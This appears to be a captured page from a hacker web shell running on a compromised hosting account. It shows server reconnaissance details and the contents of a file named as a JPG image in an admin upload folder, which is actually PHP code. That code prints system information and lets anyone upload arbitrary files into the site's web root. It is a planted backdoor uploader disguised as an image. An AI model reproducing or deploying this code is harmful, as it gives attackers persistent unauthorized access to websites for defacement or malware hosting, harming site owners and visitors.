Mr.Fn4ticHz Shell
Server IP : 198.23.62.4  /  Your IP : 18.116.19.17
Web Server : LiteSpeed
System : Linux altar18.supremepanel18.com 3.10.0-962.3.2.lve1.5.84.el7.x86_64 #1 SMP Tue Apr 2 09:33:00 UTC 2024 x86_64
User : welfareinstitute ( 2340)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/welfareinstitute/public_html/admin/upload/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/welfareinstitute/public_html/admin/upload/84631img.jpg
<?php
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
	  <input type='file' name='idx_file'>
	  <input type='submit' name='upload' value='upload'>
	  </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
	if(is_writable($root)) {
		if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
			$web = "http://".$_SERVER['HTTP_HOST']."/";
			echo "Sukses Upload -> <a href='$web$files' target='_blank'><b><u>$web$files</u></b></a>";
		} else {
			echo "Gagal Upload.";
		}
	} else {
		if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
			echo "Sukses Upload <b>$files</b> di Folder ini";
		} else {
			echo "Gagal Upload";
		}
	}
}
?>

Anon7 - 2022
AnonSec Team